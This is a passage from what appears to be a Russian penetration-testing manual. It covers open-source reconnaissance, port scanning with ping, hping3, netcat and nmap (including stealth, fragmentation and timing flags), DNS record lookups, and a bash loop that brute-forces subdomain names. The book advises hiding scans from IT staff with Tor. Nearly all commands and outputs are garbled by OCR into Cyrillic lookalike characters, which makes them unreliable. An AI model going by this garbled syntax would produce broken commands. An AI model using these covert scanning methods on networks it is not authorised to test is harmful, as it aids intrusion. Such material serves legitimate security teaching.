[*] 5еагсНіп§ Соо§1е Тог: зіТе:атагоп.сот -зіТе : аиТНогсепТгаі .атагоп.сот -зіТе:амз. 
атагоп.сот -зіТе:мНізрегсазТ .атагоп.сот -зіТе :ммм.атагоп.сот -зіТе:зТогумгіТег. 
атагоп. сот -зіТе : аТТіііаТе-Ыо§. атагоп .сот -зіТе : раутепТз -сіе. атагоп. сот 
-зіТе :раутепТз.атагоп.сот -зіТе : ксір. атагоп.сот -зіТе : асІѵегТІ5іп§. атагоп.сот 
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-5ІТе : 5ѳгѵісѳ5 . атагоп. сот -зіТе : ѵепсіогехргезз . атагоп. сот -5і1:е : зТисІіоз . атагоп. 
сот -5і1:е:сІеѵе1орег. атагоп.сот -зіТе:ѵісіеосіігесі;. атагоп.сот -зіТеіа-РТіІіаТе- 
рго§гат.атагоп .сот -5і1:е : БеІІегсепТгаІ-еигоре . атагоп. сот -5і1:е : иесІаТа . атагоп. сот 
-БІТеЛиіТсІі . атагоп. сот -5і1:е: раутепТз- сіе- 5 апсіЬох. атагоп .сот -зіТе : кіпсЦезсоиТ. 
атагоп.сот -зіТе:ти5іс .атагоп.сот -зіТе : зтііе .атагоп.сот -5і1;е : зеІІегсепТгаІ . 
атагоп.сот 


51 ІММАКѴ 


[*] 24 ТоТаІ (24 пем) ІіоаТз ТоипсІ. 


Упорядочить информацию 

Итак, мы собрали множество информации. В том виде, в каком она представлена, 
ее будет очень неудобно анализировать. Лучше всего представлять все в графиче¬ 
ском виде. 

Маке§о — одна из лучших программ, которая включена в Каіі Ілніх и содержит 
большое количество модулей. Она может собрать в автоматическом режиме боль¬ 
шое количество информации об организации и представить ее в удобном для нас 
графическом виде. И что самое замечательное, она собирает не только данные 
о сети, но и информацию о сотрудниках, контактные данные, а также демонстри¬ 
рует связь между ними. 


о К 
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Рис. 2.11. Пример работы Маііедо 


Для сбора текстовых данных очень хорошо подходит КеерХ'отс, он позволяет не 
только сохранять текстовую информацию, но и организовывать и представлять ее 
в иерархическом порядке. 
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Рис. 2.12. Пример организации информации в КеерІ\Іо(:е 


Резюме 


Получение информации из открытых источников — один из важнейших этапов, 
он занимает больше всего времени и практически не требует взаимодействия с це¬ 
левой системой. От тщательности проведения работ на данном этапе напрямую 
зависит конечный результат работы. 

Учтите, что полезной может оказаться ЛЮБАЯ информация: контактная информа¬ 
ция, страницы сотрудников в социальных сетях, новости, вакансии, документы и т. д. 

Такие поисковые системы, как Соо§1е, Яндекс, Віп§ и т. д., могут существенно 
упростить процедуру поиска. Используйте операторы поиска для получения 
релевантных результатов. При помощи одних только поисковых систем можно 
находить уязвимые места в целевой системе. 

Внимательно изучайте архивные данные, информацию из социальных сетей, от¬ 
крытые данные (домены, 55Б сертификаты, статистику). 

Не забывайте, что есть множество инструментов для автоматизации процесса, 
однако они не всегда могут заменить ручной поиск. 

Главное учесть, что даже о небольшой системе можно собрать огромное коли¬ 
чество информации. Поэтому в целях получения полной картины и облегчения 
последующей работы ее необходимо грамотно систематизировать. Используйте 
специализированное ПО. 












3 Получение информации 
от сетевых сервисов 


Введение 

Если в прошлой главе мы собирали информацию о целевой организации только из 
открытых источников, то в данном разделе мы перейдем непосредственно к полу¬ 
чению информации от внутренних сетевых сервисов целевой организации. 

На предыдущем шаге наши действия было практически невозможно обнаружить 
ни одним из известных инструментов, используемых в целях предотвращения 
атак, однако сейчас, когда мы общаемся с сервисами напрямую, нашу активность 
достаточно легко заметить. 

Учитывая вышесказанное, если вашей задачей является проведение аудита И С 
таким образом, чтобы об этом не узнал персонал одела ИТ, вам следует уделить по¬ 
вышенное внимание своей анонимности. Это можно сделать, используя различные 
прокси-серверы или такое ПО, как Тог. 

Сканирование портов 

Сканирование портов является самым первым этапом активной разведки и, по¬ 
жалуй, одним из основных. Данный метод позволяет выявить активные машины, 
работающие в сети целевой организации, а также установленное на них ПО, запу¬ 
щенные сетевые сервисы и, в некоторых случаях, версию операционной системы. 

Сканирование ТСР-портов основано на «трехстороннем рукопожатии» (ЕЬгее-ѵгау 
ІіагкЫіаке). Сканер посылает пакет 8ѴІ\' на сканируемый порт и в случае, когда 
порт открыт, получает в ответ пакет АСК, а если порт закрыт — пакет К.5Т. 

Сканирование ЕГОР-портов имеет свою особенность, так как протокол ЕШР, в от¬ 
личие от ТСР, не гарантирует надежной доставки информации и не использует 
«рукопожатий». 
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Если при сканировании обнаруживается, что порт закрыт, сканер получает назад 
сообщение «порт недоступен». В свою очередь, отсутствие такого сообщения позво¬ 
ляет сканеру принять решение о том, что порт открыт. Но тут есть одна проблема: 
если перед сервером стоит брандмауэр, который блокирует идущие от сканера за¬ 
просы, то сканер не будет получать сообщение о неудачном подключении и примет 
неверное решение о том, что порт открыт. 


Определение активных хостов 

Определение активных хостов помогает сократить время, которое требуется для 
проведения аудита. Хорошо, если сеть состоит из 5-10 адресов, но что, если из 
2-3 тысяч? Определив активные хосты и сконцентрировавшись только на них, мы 
можем сэкономить большое количество времени и уменьшить объем работы. Для 
определения активных хостов можно использовать команду ріп§: 


гооі@ка1і:~# ріп§ §оо§1е.сот 
РШ6 §00§1е.сот (216.58.211.142) 56(84) 
64 Ьуіез Тгот агп09з10-іп-Г14. 1е100. пеі 
ііте=101 та 

64 Ьуіез Тгот агп09з10-іп-Г14. 1е100. пеі 
ііте=103 та 

64 Ьуіез Тгот агп09з10-іп-Г14. 1е100. пеі 
ііте=100 та 

64 Ьуіез Тгот агп09з10-іп-Г14. 1е100. пеі 
ііте=106 та 

64 Ьуіез Тгот агп09з10-іп-Т14. 1е100. пеі 
ііте=102 тз 

64 Ьуіез Тгот агп09з10-іп-Т14. 1е100. пеі 
ііте=104 та 


Ьуіез оТ Ьаіа. 
(216.58.211.142) 

(216.58.211.142) 

(216.58.211.142) 

(216.58.211.142) 

(216.58.211.142) 

(216.58.211.142) 


Істр_зер=1 111=128 
істр_зер=2 11:1=128 
істр_зер=3 111=128 
істр_зер=4 111=128 
істр_зер=5 111=128 
істр_зер=6 111=128 


— §оо§1е.сот ріп§ зіаіізіісз — 

6 раскеіз ІгапзтіііесІ, 6 гесеіѵесі, 0% раскеі Іозз, Ііте 5009тз 
гіі тіп/аѵ§/тах/тс!еѵ = 100.708/103.112/106.570/1.985 та 


Ріп§ — стандартная утилита, которая входит в состав любой ОС. Однако у данного 
метода есть один недостаток — очень часто ІСМР, на основе которого и работает 
ріп§, заблокирован на уровне брандмауэра. И в этом случае хост, на который мы 
отправляем запросы, не будет на них отвечать, пусть даже мы точно знаем, что он 
работает и что к нему можно подключиться из любой точки мира. 

Данную ситуацию можно продемонстрировать на примере сайта тісгозо/і.сот. 

гоо!@ка1і:~# ріп§ тісгозоіі.сот 

РІР»]С тісгозо-РІ. сот (104.43.195.251) 56(84) Ьуіез оі Ьаіа. 

— тісгозоіі. сот ріп§ зіаіізіісз — 

6 раскеіз ІгапзтіііесІ, 0 гесеіѵесі, 100% раскеі Іозз, ііте 4999тз 
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Хотя к данному серверу может подключиться любой пользователь, используя 
порт 80, он не отвечает на ріп§. 

На самом деле ріп§ обладает достаточно ограниченной функциональностью. Рас¬ 
смотрим более интересную утилиту ІіріпцЗ. 

1іріп§3 работает не только с ІСМР, но и с ТСР-протоколом, а это значит, что она 
может отправлять запросы на любой порт, получать ответы и обрабатывать их. 
Приведем несколько примеров. 

Используем ІіріпцЗ как обычный ріп§: 
гоо1:@ка1і:~# (іріп§3 тісгозо-Рі. сот 

НРІІМС тісгозо-Рі.сот (е1Н0 104.40.211.35): N0 РІ_АС5 аге зет, 40 Неасіегз + 0 сіаіа 
Ьу1:е5 

— тісгозо-РІ:. сот Нріп§ зТаПзПс — 

5 раскеіз ігапзтіІДесІ, 0 раскеіз гесеіѵесі, 100% раскеі 1оз5 
гоипсі-іігір тіп/аѵ§/тах = 0.0/0.0/0.0 тз 

Теперь отправим 1 пакет (-с 1) с установленным флагом АСК (-А) на порт 80 и ука¬ 
жем, что с нашей стороны мы ждем ответ на порт 5050: 

гоо1@ка1і:~# (іріп§3 -с 1 -V -р 80 -з 5050 -А тісгозо-РІ. сот 
изіп§ еРР0, асігіг: 192.168.126.129, МТІІ: 1500 

НРІМС тісгозоРР.сот (еРМ0 104.43.195.251): А зеР, 40 Ііеасіегз + 0 сіаіа ЬуРез 
1еп=46 Ір=104.43.195.251 РР1=128 ісі=4481 РО5=0 Ір1еп=40 
зрогР=80 Р1а§з=К зел=0 міп=32767 гРР=0.2 тз 
зел=95397285 аск=0 зит=3205 игр=0 


— тісгозоРР.сот Нріп§ зРаРізРіс — 

1 раскеРз РгапзтіРРесІ, 1 раскеРз гесеіѵесі, 0% раскеР Іозз 
гоипсІ-Ргір тіп/аѵ§/тах = 0.2/0.2/0.2 тз 

ІЮР-сканирование 

Как мы уже говорили, принцип работы протокола ЕГОР отличается от ТСР. 13 ПР 
работает без установки предварительного соединения, а это значит, что в нем от¬ 
сутствует процесс «рукопожатий». Данный протокол не обеспечивает надежной 
доставки информации и используется в системах реального времени — например, 
для организации видеоконференций. 

Его не принято активно использовать во время сканирования как раз по причине 
ненадежности, ведь это может привести к потере части информации, необходимой 
для дальнейшего проведения атаки. 

Используем утилиту пеГсаі для проверки интересующих нас портов на целевой 
машине: 

гоо1:@ка1і:~# пс -пѵ -и -г -м 1 192.168.0.15 150-170 
(ШКІ\ЮШ) [192.168.0.15] 162(зптр)ореп 
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Поскольку мы послали ІЮР-пакет на определенный порт и не получили ответа, 
это означает, что порт открыт. Однако если порт закрыт, мы должны получить 
ІСМР-ответ «порт недоступен». 


ЫМАР 

ИМАР — кроссплатформенный, бесплатный и многофункциональный сканер 
портов. На наш взгляд, это один из лучших сканеров. 

Самый простой способ просканировать сервер, например 192.168.10.15, на наличие 
открытых портов — это ввести команду птар 192.168.10.15. 

гооі@ка1і:~# птар 192.168.10.15 

ЗГагГіпё ІМтар 7.25ВЕТА1 ( Шірз ://птар.ог§ ) аі 2016-10-20 07:21 ЕЭТМтар асап 
герогі Тог таі1.ог§.сот (192.168.10. 15)Нозі іа ир (0.0026а Іаіепсу ). N01: зіюмп: 

991 сіоаесі рогТаРОКТ 5ТАТЕ 5ЕКѴІСЕ22/Тср ореп ззІі25/1:ср ореп атТр80/Тср 
ореп ЬТТрШ/Тср ореп грсЫпсІ443/1:ср ореп Рі1:Тра1720/Тср ореп Н. 323/р. 9313306/ 
Тер ореп туа^15555/Тср ореп Тгеесіѵ8089/Тср ореп ипкпомпМтар сіопе: 1 ІР асісігеаа 
(1 ИоаТ ир) асаппесі іп 0.46 аесопсіа 

Итак, мы видим, что было найдено 9 открытых портов, но дело в том, что когда мы 
запускаем данную утилиту, она не сканирует хост на все открытые порты, а только 
на самые популярные. 

Для того, чтобы птар просканировал нужный хост на все открытые порты, запу¬ 
стим его с дополнительным параметром (-р). 

гооТ@ка1і:~# птар 192.168.10.15 

5ТагТіп§ КІтар 7.25ВЕТА1 ( РіТТрз ://птар.ог§ ) аТ 2016-10-20 07:30 ЕОТМтар асап 
герогТ Тог таі1.ог§.сот (192.168.10.15)НоаТ іа ир (0.0032з Іаіепсу ). N01: зіюмп: 

65525 сіоаесі рогТзРОКТ 5ТАТЕ 5ЕКѴІСЕ22/Тср ореп ззН25/Тср ореп атТр80/Тср 
ореп ЬТТрШ/Тср ореп грсЬіпсі443/Тср ореп ШТрз1012/Тср ореп ипкпомп1720/ 

Тер ореп Н. 323/р. 9313306/Тср ореп туз^15555/Тср ореп Тгеесіѵ8Ѳ89/Тср ореп 
ипкпоыпМтар сіопе: 1 ІР асісігеаа (1 НозТ ир) асаппесі іп 24.13 аесопсіа 

Итак, мы видим, что, запустив упомянутую программу с дополнительным параме¬ 
тром и указав полный диапазон портов, мы получили дополнительный результат 
и полную картину о сетевых сервисах, к которым мы можем подключиться. 

Но согласитесь, если перед нами достаточно большая сеть, сканировать каждую 
отдельную машину будет очень неудобно и долго. Для того чтобы оптимизировать 
этот процесс, мы можем использовать символ * вместо последнего октета в сетевом 
адресе. 

гооі@ка1і :~# птар 192.168.10.* 

Зіагііпё Мтар 7.25ВЕТА1 ( Шіра ://птар.ог§ ) аі 2016-10-20 07:40 ЕОТМтар асап 
герогі Тог таі1.ог§.сот (192.168.10. 15)Ноаі із ир (0.0084а Іаіепсу) .N01: аііомп: 

991 сіоаесі рогіаРОКТ 5ТАТЕ 5ЕКѴІСЕ22/Гср ореп зз!і25/1:ср ореп атір80/1:ср 
ореп ЫГрШ/Гср ореп грсЬіпсІ443/1:ср ореп Ш1:рз1720/1:ср ореп Н. 323/р. 9313306/ 
іер ореп туз^15555/1:ср ореп Ргеесіѵ8089/1:ср ореп ипкпомп 
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ІМтар 5сал леролТ Тог таі11.ол§.сот (192.168.10.18) 

Н05І І5 ир (0.00845 ІаТепсу) .N01 5Ьомл: 990 сІ05ес) ролІ5Р0КТ 5ТАТЕ 5ЕКѴІСЕ22/ 

Тер орел 55Н25/Тср орел 5шТр80/Тср орел ЫТрШ/Тср орел грсЬіпсІ443/ 

Тер орел ІіТТр5І720/Тср орел Н. 323/р. 9313306/Тср орел ту5р15555/Тср орел 
Тлеесіѵ8080/Тср орел ЫТр-рлоху8089/Тср орел илкломл 

N 1 ^ 5сап леролТ Тол меЬ.ол§.сот (192.168.10.25)Но5Т І5 ир (0.00755 ІаТепсу). 

N01 5ііоип: 994 СІ05ѲСІ ролІ5Р0КТ 5ТАТЕ 5ЕРѴІСЕ22/Тср орел 55И80/Тср орел 
ЫТр443/Тср орел ЫТр5І720/Тср орел Н. 323/р. 9313306/Тср орел ту5р18089/Тср орел 
ипкпомп 

Nтар сіопе: 256 ІР асІсіле55е5 (3 Ьо5І5 ир) 5саппесІ іл 20.52 5есолсІ5 

А теперь попробуем получить информацию об установленной ОС на одном из 
найденных серверов, используя параметр «-0»: 

лооТ@ка1і:~# птар -0 192.168.10.15 

5ТалТ1п§ N 11 ^ 7.25ВЕТА1 ( ИТТр5 ://птар.ол§ ) аТ 2016-10-20 07:55 ЕРТМтар 5сап 
леролТ Тол таі1.ол§.сот (192.168.10. 15)Ілѵа1ісі Тал§еТ Ьо5Т 5ресіТісаТіоп : 139Н05Т 
І5 ир (0.00145 ІаТепсу). N01 5ііоип: 991 сІ05есІ ролІ5Р0КТ 5ТАТЕ 5ЕКѴІСЕ22/Тср 
орел 55Ь25/Тср орел 5шТр80/Тср орел ЫТрШ/Тср орел лрсЫпЬ443/Тср орел 
ЫТр5І720/Тср орел Н. 323/р. 9313306/Тср орел ту5р15555/Тср орел Тлеесіѵ8089/ 

Тер орел ипкпомпОеѵісе Туре: §епела1 рипро5еКиппіп§: Ипих 2.6.Х05 СРЕ: ере:/ 
о: Ііпих: 1іпих_келпе1 :2.6.2205 сіеТаіІ5: Ипих 2.6.22, 1_ілих 2.6.9 - 2.6.27НеТмолк 
ОІ5Тапсе: 3 Нор505 сіеТесТіоп релТолтес). Р1еа5е леролТ апу іпсоллесТ ле5и1І5 аТ 
ИТТр://птар.ол§/5иЬшіТ/ N 1 ^ сіопе: 1 ІР асісіле55 (1 Ьо5І ир) 5саппесі іп 2.08 5есопсІ5 

Мы видим, что наш сервер работает под управлением ОС Ілніх с версией ядра 
2.6.22. К сожалению, эта функция не всегда выдает точный результат и может сбить 
вас с толку. 

Также с помощью птар можно собрать еще больше информации, используя пара¬ 
метр «—А». 

лооТ@ка1і:# птар -0 192.168.10.15 

5ТалТіп§ N 11 ^ 7.25ВЕТА1 ( ИТТр5 ://птар.ол§ ) аТ 2016-10-20 08:01 ЕРТМтар 5сап 
леролТ Тол таі1.ол§.сот (192.168.10.15)Но5Т І5 ир (0.00155 ІаТепсу). N01 5Ьомп: 991 
СІ05ѲСІ ролІ5Р0РТ 5ТАТЕ 5ЕКѴІСЕ ѴЕК5КШ2/Тср орел 55Ті Орел55Н 

4.1 (рлоіосоі 2.0)| 55Іі-Ио5Ткеу: 2048 36:аТ:Т0:сІ8:с9:69:2Ь:еЬ:Ь6:с8:сІ2:сІ6:Ь5:сІ4:се 
:Ь9 (05А) 

|_2048 а4: 0с : 5с : ТЬ: 5а : сІ8: а2:4Т: 5сІ:ТсІ: СІЗ: 37:97: е5: 1Ь: 61 (К5А) 

25/Тср орел 5тТр Ехіт 5тТрсІ |_5тТр-сотталсІ5: таі1.ол§.сот, РіРЕЬ^^б, 

5І2Е 47700000, ЕТІЩ, 5ТАКТТЕ5, АІЛН СКАМ-МЭ5 РІСЕ5Т-М05 [_0С^ РЕАІЩ АЦТН=СКАМ-М05 
0ІСЕ5Т-Ш5 ЮС^ РЕАЩ ЕЫНАМСЕ05ТАТЦ5С00Е5, 8ВІТМІМЕ, 05Щ | 55І-СѲЛІ: 5иЬ]есТ: 
соттопNате= таіі.ол§. сот /ол§апі 2 аТіопNате= 0 л§.сот/5ТаТе0лРлоѵіпсеNате=5раіп/ 
соипТлуМате=5Р | N01 ѵаіісі ЬеТоле: 2012-05-20Т09:02:09+00:00|_NоТ ѵаіісі аТТел: 
2014-05-18Т09:02:09+00:001_55І-сІаТе: 2013-06-29Т14:18:46+00:00; -35 Тлот Іосаі 
Тіте. 

80/Тср орел ЫТр АрасЬе ИТТрсІ 2.2.3 ((5и5е))| ЫТр-теТІіосІ5: РоТепТіаІІу 

лі5ку теТИосІ5: ТКАСЕ|_5ее ИТТр://птар.ол§/п5есІос/5слірТ5/ЫТр-теТІіосІ5.Ыті|_ЫТр- 
ТіТІе: 5іТе сІое5п'Т Ьаѵе а ТіТІе (ТехТ/ЫтІ; сЬал5еТ=ІІТР-8). 

111/Тср орел лрсЬілсІ 2 (КРС #100000) | лрсілТо: | рло§лат ѵел5іол 

ролТ/рлоТо 5елѵісе| 100000 2 111/Тср лрсЬілсІ | 100000 

2 111/исІр лрсЬілсІ I 100024 1 1009/исІр 5ІаТи5|_ 100024 1 

1012/Тср 5ІаТи5 
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443/1:ср орел ззІ/Шір АрасНе ІтЫірсІ 2.2.3 ((5и5е))| Ыір-теііюсіз : Роіепііаііу 
гізку теНюсІз: ТКАСЕ|_5ее Шір : //пшар.ог^/пзесІос/зсгіріз/НІАр-теіІіосіз . 

ИТтІ^ИТТр-ТіТІе : 5ііе сіоезп'і: Ііаѵе а ііііе (іехі/ШтІ; сНагзе1:=ІІТЕ-8). | ззі- 
сегі: 5иЬ]ес1:: соттог^ате=1оса1Ію5І:. 1оса1гіотаіп/ог§апіга1:іопМате=5оте0г§апіга 
ііоп/з1:а1:еОгРгоѵіпсеМате=5оте51:а1:е/соип1:гуМате=--1 N01: ѵаіісі ЬеГоге: 2011-05- 
27Т11:04: 52+00:001_Моі ѵаіісі аТіег: 2012-05-26Т11:04: 52+00:00 |_зз1-сІа1:е: 2013-06- 
29Т14:18:46+00:00; -Зз Тгот Іосаі ііте. 

1720/іср орел Н.323/р.931?3306/1:ср орел тузрі Му5()1 (ипаи1:ІіогІ2есІ)5555/ 

іср орел отпіЬаск НР ОрепѴіем ОтпіЬаск/Оаіа Ргоіес1:ог8089/1:ср орел ззІ/Шір 
Бпогі: НіірсІ | _М:1:р-те-Ыпосі5: N 0 АІІом ог РиЫіс ііеасіег іп 0РТІ0М5 гезропзе (зіаіиз 
сосіе 501) І-ИТТр-ТіТІе: злогіісі| ззі-сегі:: БиЬз'есТ: соттопМате=5пог1:5егѵег0еТаи11:С 
ег1:/ог§апіга1:іопМате=5пог1:ІІ5ег | N01: ѵаіісі ЬеТоге: 2012-Ѳ2-03Т11:18:41+00:00|_Моі 
ѵаіісі аТіег: 2015-02-02Т11:18:41+00:00|_зз1-сІа1:е: 2013-06-29Т14:18:46+00:00; -Зз 

Тгот Іосаі Тіте.|_55 іѵ2 : зегѵег зіііі зиррогіз 55іѵ2 

Реѵісе Туре: §епега1 ригрозеКиппіпё: Нпих 2.6.Х05 СРЕ: сре:/о: Нпих : 1іпих_ 
кегпе1:2.605 сІеТаіІз: Нпих 2.6.9 - 2.6.27МеТмогк ОізТапсе: 3 ІіорзБегѵісе ІпТо: 
НозТз: таі1.ог§.сот; 05: ІІпіх 

ТКАСЕКОІІТЕ (изіп§ рогТ 587/Тср)Н0Р РТТ АЭРКЕ551 3.00 тз 192.168.25.2542 
4.00 тз 192.168.100.13 4.00 тз таі1.ог§.сот (192.168.10.15) 

05 апс! Бегѵісе сіеТесТіол регТогтесІ. Ріеазе герогТ апу іпсоггесТ гезиІТз аТ ИТТр:// 
птар.ог§/зиЬтіТ/ ^тар сіопе: 1 ІР асісігезз (1 ИозТ ир) зсаппесі іп 28.98 зесопсіз 

Просим обратить внимание на то, что данный метод позволяет собирать все бан¬ 
неры (то, что система сама может о себе рассказать) со всех открытых сетевых 
сервисов. 

В результате мы получили много интересной информации, а именно: имя и версию 
почтового агента, имя и версию веб-сервера, точное название ОС и много другой 
полезной информации. 

Ниже мы приведем таблицу других дополнительных параметров, которые помо¬ 
гут провести сканирование намного эффективнее. Эта таблица содержит не все 
возможные параметры, а только самые основные. Более подробную информацию 
можно получить в документации к данной утилите. 


-зТ 

Сканирование с установлением ТСР-соединения. Производится по умолча¬ 
нию, если не указано другое 

-з5 

ЗУТЧ-сканирование. Сканирование с использованием полуоткрытых соедине¬ 
ний — соединение ТСР/ІР никогда не открывается полностью. Сканер портов 
генерирует пакет 5УМ Если порт на целевом хосте открыт, с него придет 
пакет 8У1М-АСК. Хост сканера отвечает пакетом К.8Т, закрывая тем самым 
соединение до того, как процесс установления соединения завершился. При 
использовании данного метода можно остаться незамеченным, ведь отдельные 
приложения никогда не получают входящее соединение (оно обрывается на 
этапе установки) 

-зР 

РПУ-сканирование. Некоторые серверы способны отследить попытку 8У1Ч- 
сканирования их портов. Сканирование с использованием РШ-пакетов 
позволяет обойти подобные средства защиты. На прибывший РШ-пакет на 
закрытый порт сервер должен ответить пакетом К8Т. РШ-пакеты на открытые 
порты должны игнорироваться сервером. По этому различию становится воз¬ 
можным отличить закрытый порт от открытого 
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-зХ 

ХМАЗЗ-сканирование. Сканер отправляет пакеты с флагами РШ, Р8Н, ІШС. 
Если порт закрыт, в ответ придет пакет с флагом К5Т. Если же ответа не будет, 
то порт открыт (так как такой сегмент просто игнорируется) 

-8Х 

МПЕЕ-сканирование. Позволяет пакетам проходить через брандмауэр, в дан¬ 
ном пакете не стоит ни одного флага, в отличие от ХМА53. В случае, если порт 
закрыт, придет пакет с флагом К5Т. Работает только в ІІпіх-среде 

-зР 

Сканирование с использованием ріп§ 

-8 Б 

Сканирование с использованием ЕШР-протокола 

-зА 

АСК-сканирование. Данное сканирование применяется для определения того, 
фильтруется данный порт или нет, и особенно эффективно для определения на¬ 
личия брандмауэров и выяснения их правил. Простая фильтрация пакетов раз¬ 
решит прохождение пакетов с установленным битом АСК (используемых для 
уже установленных соединений), тогда как более сложные брандмауэры — нет 

-зК 

КРС (Кетоіе Ргосебиге Саіі) сканирование 

-оХ 

Нормальный вывод 

-оХ 

Вывод информации в формате ХМЙ 

-оС 

Вывод в формате, удобном для поиска утилитой §гер или ей подобными 

-Т Рагапоісі 

Делает паузы между сканированиями продолжительностью 300 секунд. В не¬ 
которых случаях это позволяет аудитору дольше не привлекать к себе внима¬ 
ния, но существенно увеличивает время выполнения работы 

-Т Зпеаку 

Делает паузы между сканированиями продолжительностью 15 секунд 

-Т Роіііе 

Делает паузы между сканированиями продолжительностью 4 секунды 

-Т №эгта1 

Одновременно выполняет несколько операций сканирования 

-1 

Сканирование фрагментированными пакетами. Разбивает пакет на небольшие 
кусочки, что в некоторых случаях позволяет избежать обнаружения 


Получение информации от ОМ5-сервера 

Благодаря информации, которую мы можем получить от ПХЗ-сернера, можно со¬ 
ставить список публичных внешних, а порой и внутренних серверов, используемых 
целевой организацией. 


Типы записей 

Прежде чем мы начнем искать информацию, используя І)Х8, выясним, какие типы 
записей использует данный сервис и какую информацию мы можем почерпнуть 
из них: 

□ А (АсИгезз) — связывает доменное имя и ІР-адрес; 

□ 50А (Зіагі; оГ АіН ІіогПу) — показывает, какие Г)Х8 отвечают за эталонную ин¬ 
формацию о данной зоне; 
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□ СИАМЕ (Сапопісаі Кате) — дополнительное имя для данного домена; 

□ МХ (Маіі Ехсііапце) — определяет, какие почтовые серверы обслуживают дан¬ 
ную зону; 

□ ЗКѴ (Зегѵісе) — показывает, какие сервисы обслуживают данную зону (напри¬ 
мер, серверы активной директории); 

□ РТК ( Роіпіег) — привязывает ІР-адрес к доменному имени; 

□ N5 (Иате Зегѵег) — показывает, какие БИЗ-серверы обслуживают данную зону. 


Взаимодействие с ОЫ5-сервером 

Взаимодействовать с БИЗ-сервером можно несколькими различными способами, 
например через упомянутую ранее кроссплатформенную утилиту пзіоокир. 

Просто набрав следующую команду, мы направим БХ'З-.заіірос к тому БХ'8-серверу, 
который указан в наших настройках ТСР/ІР-соединения: 

гооТ@ка1і :~# пзіоокир зарапТосІау .сот 
Зегѵег : 192.168.126.2 

Асісігезз : 192.168.126.2*53 

Моп-аиійогііаііѵе апзмег: 

№ате: зарапіосіау.сот 

Асісігезз: 172.99.100.142 

В данном примере мы обратились к локальному БN8 и запросили ІР-адрес для 
домена )арапІос1ау.сот. БІчІЗ-сервер вернул нам ответ — 108.166.65.155. 


МХ-записи 


С помощью того же шіоокир можно получить список почтовых серверов, исполь¬ 
зуемых данной организацией: 

гоо1:@ка1і :~# пзіоокир 

> зет л=тх 

> зарапТосіау.сот 

5егѵег : 192.168.126.2 

Асісігезз : 192.168.126.2*53 


Моп-аиііюгіііаіііѵе апзмег: 

Зарапіосіау . сот таіі ехсИап§ег = 
Зарапіосіау . сот таіі ехсНап§ег = 
дарапіосіау . сот таіі ехсНап§ег = 
Зарапіосіау . сот таіі ехсНап§ег = 
дарапіосіау . сот таіі ехсИап§ег = 


5 а112.а5ртх.1.§оо§1е.сот. 
10 азртхЗ.^оо^ІетаіІ.сот. 

1 аБртх.1.§оо§1е. сот. 

5 а11:1.а5ртх.1.§оо§1е.сот. 
10 а5ртх2.§оо§1етаі1.сот. 


АиіИогііаііѵе апгмегз сап Ье Гоипсі Ггот: 
а5ртхЗ.§оо§1етаі1.сот іпіегпеі: асісігезз = 74.125.28.26 



48 Глава 3 


Получение информации от сетевых сервисов 


азртх. 1 .§оо§1е.сот Гіа 5 АААА асШгезз 2а00:1450:4010:с02:: Іа 
аІП .азртх. 1.@оо§1е.сот Гіаз АААА асісігезз 2404:6800:4008:с01:: 1Ь 

азртх2.@оо§1етаі1 .сот іпТегпеТ асісігезз = 173.194.72.26 
азртх2.@оо§1етаі1 .сот Гіа 5 АААА асісігезз 2404:6800:4008:с01:: 1Ь 

Обратите внимание на то, что возле каждой МХ-записи находится число - 1,5 
или 10. 

Это число обозначает приоритет почтовых серверов. Например, когда почтовый 
агент попытается доставить е-таіі для домена ]арап1осІау.сот, он сначала попы¬ 
тается соединиться с сервером, приоритет которого равен 1, и только в случае не¬ 
удачи будет пытаться установить соединение с сервером, имеющим более высокий 
приоритет. 


ЫЗ-запросы 

Похожим способом можно определить, какие КЗ-серверы отвечают за данный 
домен: 

гооТ@ка1і : ~# пзіоокир 

> зет Туре=пз 

> зарапТосіау . сот 

5егѵег : 192.168.126.2 

Асісігезз : 192.168.126.2#53 

І\Іоп-аи1:Ііогі1:а1:іѵе апзмег 

З'арапТосіау .сот 
З'арапТосІау .сот 

АиГНогіТаІсіѵе апзмегз сап Ье Гоипсі Ггот: 

сіпзі . зТаЫеТгапзіІ:. сот іпГегпеТ асісігезз = 69.20.95.4 

СІП52 . зТаЫеТгапзіІ:. сот іпТегпеТ: асісігезз = 65.61.188.4 

Мы получили адреса двух серверов. Эта информация может понадобиться в даль¬ 
нейшем, когда мы попытаемся подобрать имена серверов или перенять зону. 

Перебор имен 

Главная идея данного метода состоит в попытке угадать доменные имена серве¬ 
ров, которые используются компанией. Очень часто это бывает полезно, так как 
обычно имя сервера отражает его содержание. Например, сервер с именем ГігсѵѵаІІ. 
Іарапгосіау.соіп, скорее всего, окажется брандмауэром данной организации. 

Для данной задачи очень хорошо подходит утилита Ьозі, входящая в состав Ьіпих- 
дистрибутивов. 

гооТ@ка1і :~# ИозТ мим.опз .§оѵ. ик 
ммм.опз .§оѵ. ик із ап аііаз Тог опз.§оѵ.ик. 
опз.§оѵ.ик Гіа з асісігезз 81.17.70.138 


патезегѵег = сіпзі. 5ІаЫе1:гап5І1:. сот. 
пате5егѵег = сІпзг.зТаЫеІігапзі'Ь.сот. 
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опз.§оѵ.ик таіі із ЬапЫесі Ьу 20 с1из1:ег.§зі2.те5за§е1аЬ5.сот. 
опз.§оѵ.ик таіі із ЬапЫесі Ьу 10 с1из1:ег.§зі .тезза§е1аЬз. сот. 

гооТ@ЬТ :~# Мог! поп.опз.§оѵ.ик 

Нозі поп .опз,§оѵ.ик поі -РоипсІ: 3(І\ІХ00МАІГ\І) 

Согласитесь, что перебирать имена вручную — задача поистине титаническая. 
Для того чтобы автоматизировать данную задачу, нам нужен файл, содержащий 
список возможных имен. Такой файл можно найти в Интернете или составить 
самому. 

Для примера сделаем файл бпз-патез.Ш;, в котором, по одной в строке, будут рас¬ 
полагаться следующие записи: таіі, бпз, Йр, Ые, ѵрп, іезі, беѵ, ргосі, ѵоір, ГігсѵѵаІІ. 

#1 /Ьіп/ЬазЬ 

Тог пате іп $(саі Ьпз-патез.1:х1:);сІо 
Ьозі $пате.опз.§оѵ.ик |§гер "Ьаз асІЬпезз" 

Ьопе 

Разъяснение работы скрипта. 

Первая строка указывает на то, что мы будем использовать ВазЬ для интерпретации 
команд. 

Вторая строка задает начало цикла, который по очереди берет записи из файла 
«бпз-патез.Ш» и присваивает их переменной «пате». 

Третья строка выполняет команду «Ьозі» для домена, первая часть которого — пере¬ 
менная «пате», а вторая — «,опз.§оѵ.ик» — остается неизменной. Команда «§гер» 
